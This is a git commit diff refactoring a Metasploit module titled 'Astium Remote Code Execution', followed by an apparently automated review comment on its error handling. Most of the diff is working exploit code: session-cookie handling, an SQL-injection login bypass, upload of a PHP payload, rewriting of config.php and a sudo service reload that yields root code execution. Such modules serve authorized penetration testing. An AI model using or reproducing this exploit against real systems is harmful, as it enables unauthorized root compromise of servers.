Merge pull request #1 from jvazquez-r7/review-pr2379

Clean up Astium exploit
bug/bundler_fix
xistence 2013-09-21 22:22:37 -07:00
commit 64156a1e09
1 changed files with 34 additions and 58 deletions


@ -8,7 +8,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking # Configuration is overwritten and service reloaded
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => "Astium Remote Code Execution",
'Description' => %q{
This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and lower.
Admin access is gained by an SQL Injection authentication bypass in the login form.
Having admin access makes it possible to upload PHP code.
This PHP code will modify the "/usr/local/astium/web/php/config.php" script and add our payload.
A "sudo /sbin/service astcfgd reload" is executed to reload the configuration with root privileges
and trigger remote code execution.
This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and
lower. A SQL Injection vulnerability is used to achieve authentication bypass and gain
admin access. From an admin session arbitrary PHP code upload is possible. It is used
to add the final PHP payload to "/usr/local/astium/web/php/config.php" and execute the
"sudo /sbin/service astcfgd reload" command to reload the configuration and achieve
remote root code execution.
},
'License' => MSF_LICENSE,
'Author' =>
@ -31,13 +31,14 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '88860' ],
[ 'EDB', '23831' ]
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Astium', {}]
['Astium 2.1', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 17 2013",
@ -49,10 +50,15 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def check
uri = target_uri.path
peer = "#{rhost}:#{rport}"
def peer
return "#{rhost}:#{rport}"
end
def uri
return target_uri.path
end
def check
# Check version
print_status("#{peer} - Trying to detect Astium")
@ -69,55 +75,24 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = target_uri.path
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Retrieving cookie")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "en", "content", "index.php")
})
if res && res.code == 302
if (res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/)
session = $1
redirect = URI(res.headers['Location'])
print_status("#{peer} - Session cookie is [ #{session} ]")
print_status("#{peer} - Location is [ #{redirect} ]")
else
return fail_with(Exploit::Failure::Unknown, "Session cookie not found!")
end
else
return fail_with(Exploit::Failure::Unknown, "Retrieving cookie failed!")
end
# Follow redirection process
print_status("#{peer} - Following redirection")
res = send_request_cgi({
'uri' => "#{redirect}",
'method' => 'GET',
'cookie' => "astiumnls=#{session}"
})
if not res or res.code != 200
return fail_with(Exploit::Failure::Unknown, "Redirect Failed!")
end
print_status("#{peer} - Access login page")
res = send_request_cgi({
'method' => 'GET',
'cookie' => "astiumnls=#{session}",
'uri' => normalize_uri(uri, "?js=0&ctest=1&origlink=/en/content/index.php")
'uri' => normalize_uri(uri),
'vars_get' => {
'js' => '0',
'ctest' => '1',
'origlink' => '/en/content/index.php'
}
})
if res && res.code == 302
if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/
session = $1
print_good("#{peer} - Session cookie is [ #{session} ]")
redirect = URI(res.headers['Location'])
print_status("#{peer} - Location is [ #{redirect} ]")
else
return fail_with(Exploit::Failure::Unknown, "Access to login page failed!")
fail_with(Exploit::Failure::Unknown, "#{peer} - Access to login page failed!")
end
@ -130,9 +105,10 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
return fail_with(Exploit::Failure::Unknown, "Redirect failed!")
fail_with(Exploit::Failure::Unknown, "#{peer} - Redirect failed!")
end
sqlirandom = rand_text_numeric(8)
# SQLi to bypass authentication
@ -151,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 302
return fail_with(Exploit::Failure::Unknown, "Login bypass was not succesful!")
fail_with(Exploit::Failure::Unknown, "#{peer} - Login bypass was not succesful!")
end
# Random filename
@ -191,8 +167,8 @@ class Metasploit3 < Msf::Exploit::Remote
# If the server returns 200 and the body contains our payload name,
# we assume we uploaded the malicious file successfully
if not res or res.code != 200
return fail_with(Exploit::Failure::Unknown, "File wasn't uploaded, aborting!")
if not res or res.code != 200 or res.body !~ /#{payload_name}/
fail_with(Exploit::Failure::Unknown, "#{peer} - File wasn't uploaded, aborting!")
end
register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}")
@ -202,12 +178,12 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "upload", "#{payload_name}")
},60)
}, 60)
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
return fail_with(Exploit::Failure::Unknown, "Exploit failed!")
print_error("#{peer} - Unexpected response...")
end
end
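Review bot: In the hunk at -69,55 +75,24, the new combined condition `if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/` is followed by `redirect = URI(res.headers['Location'])`, which raises (ArgumentError on a missing header, URI::InvalidURIError on a malformed one) instead of reporting a clean failure; the Location value is supplied by the target, so the module should guard it, e.g. `location = res.headers['Location']` and `fail_with(Exploit::Failure::Unknown, "#{peer} - Location header not found!") unless location` before the `URI(...)` call. As a point of style, the new conditions on that line and on `if not res or res.code != 200 or res.body !~ /#{payload_name}/` use `and`/`or`/`not`; the Ruby style guide prefers `&&`/`||`/`!`, and the body check reads more simply as `!res.body.include?(payload_name)`, which also avoids interpolating a value into a regex. In the last hunk the unchanged condition `if res and res.code != 200` still lets a nil response fall through without any message, so the new `print_error` never fires in exactly the case the preceding comment describes; `unless res && res.code == 200` would cover both. The `exploit` method continues beyond the end of these hunks.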